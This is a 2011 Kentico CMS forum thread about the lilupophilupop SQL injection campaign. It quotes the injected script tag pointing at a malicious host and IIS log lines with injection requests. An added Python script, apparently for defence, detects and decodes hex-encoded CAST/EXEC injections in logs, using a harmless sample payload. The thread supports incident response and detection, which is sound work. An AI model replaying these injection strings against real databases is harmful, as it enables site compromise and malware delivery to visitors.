Member
fzk-hotmail.com - 12/8/2011 3:58:17 AM

SQL Injection (lilupophilupop)
We lost control of our Kentico CMS site; all data was deleted (updated) because of this attack:

http://isc.sans.edu/diary.html?storyid=12127

Strings in tables were updated with that line:

></title><script src="hXXp://lilupophilupop.com/sl.php"></script>

At least 200,000 sites were affected in a few days. Probably most of your sites will be attacked too.

I wonder whether Kentico knows about this attack and has any update?

Kentico Consulting
kentico_borisp - 12/8/2011 4:09:08 AM

RE:SQL Injection (lilupophilupop)
Hello,

Yes, we already received a message regarding this issue.
Do you use any query parameters in the Where conditions/Order by expressions of any viewers?
Do you use any custom queries/web parts where the visitor can affect the query that is run on the database?
The standard web parts/Kentico components are protected against SQL injection, but there can be, for example, a custom unsecured Where condition.
We improve security in every version, so upgrading to the current version with the latest hotfix, or upgrading to version 6.0, is highly recommended.

Best regards,
Boris Pocatko

Member
fzk-hotmail.com - 12/8/2011 4:50:34 AM

RE:SQL Injection (lilupophilupop)
The IIS log looks like this; I am not sure what was on these pages:

2011-12-06 21:12:09 W3SVC1374239889 195.49.216.36 GET /XXXXXX/GetFile.aspx nodeid=25968%29+
+exec%28%40s%29-- 80 - 173.212.213.36 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0) 500 0 0


OR

2011-12-06 21:08:50 W3SVC1374239889 195.49.216.36 GET /XXXXXX/XXXXXX/popup.aspx
type=single&aliaspath=%2FXXXXXX+UniverSiteSi%2FEnglish%2FEducation%2FGraduate%2FSocial+Sciences+Graduate+Studi%2FLaw%2FNews%2FLatest+News%27
-- 80 - 173.212.213.36 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0) 500 0 0
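
As an added example (not from the thread, and not Kentico code), a small triage script for IIS W3C logs of the layout quoted above: it URL-decodes the cs-uri-query field, looks for the declare/set/cast(0x...)/exec(@s) shape that the lilupophilupop requests carry, and decodes the hex literal so the hidden statement can be read. Log lines, site name and IPs are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (not the poster's log). Field order is the
# default layout seen in the thread:
# date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port
# cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
# The hex literal below is just "select 1", a placeholder for the real payload.
SAMPLE_LOG = """\
2011-12-06 21:12:09 W3SVC1 10.0.0.5 GET /site/GetFile.aspx nodeid=25968%29+declare+%40s+varchar%284000%29+set+%40s%3Dcast%280x73656c6563742031+as+varchar%284000%29%29+exec%28%40s%29-- 80 - 203.0.113.7 Mozilla/4.0+(compatible) 500 0 0
2011-12-06 21:12:10 W3SVC1 10.0.0.5 GET /site/GetFile.aspx nodeid=25968 80 - 203.0.113.8 Mozilla/4.0+(compatible) 200 0 0
"""

# Once URL-decoded, the request assigns CAST(0x<hex> AS VARCHAR(...)) to a
# variable and then EXECs that variable; both parts must be present.
HEX_CAST = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+n?(?:var)?char", re.I)
EXEC_VAR = re.compile(r"exec\s*\(\s*@\w+\s*\)", re.I)


def decode_hex_payload(hex_digits: str) -> str:
    """Turn the 0x... literal back into the T-SQL text it hides."""
    return bytes.fromhex(hex_digits).decode("latin-1", errors="replace")


def scan_iis_log(text: str) -> list:
    """Return one finding per record whose query string carries the
    hex-encoded CAST ... EXEC injection, with the decoded statement."""
    findings = []
    for line in text.splitlines():
        fields = line.split(" ")
        if len(fields) < 14 or fields[0].startswith("#"):
            continue  # "#Fields:" header or malformed record
        query = unquote_plus(fields[6])
        hex_match = HEX_CAST.search(query)
        if not hex_match or not EXEC_VAR.search(query):
            continue
        findings.append({
            "time": f"{fields[0]} {fields[1]}",
            "client_ip": fields[9],
            "uri": fields[5],
            "status": int(fields[11]),
            "decoded_sql": decode_hex_payload(hex_match.group(1)),
        })
    return findings


if __name__ == "__main__":
    for finding in scan_iis_log(SAMPLE_LOG):
        print(finding)
```

A 500 status on a flagged line does not mean the injection failed; the page's own error after a successful EXEC looks the same, so treat every hit as a possible compromise and check the database for the injected string.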




Kentico Consulting
kentico_borisp - 12/9/2011 8:10:59 AM

RE:SQL Injection (lilupophilupop)
Hello,

Could you please send us a message to support@kentico.com? We will need additional details to debug this issue.
Additionally, which version of Kentico are you using? Older versions had a vulnerability, but this was fixed in the 6.0 version.

Best regards,
Boris Pocatko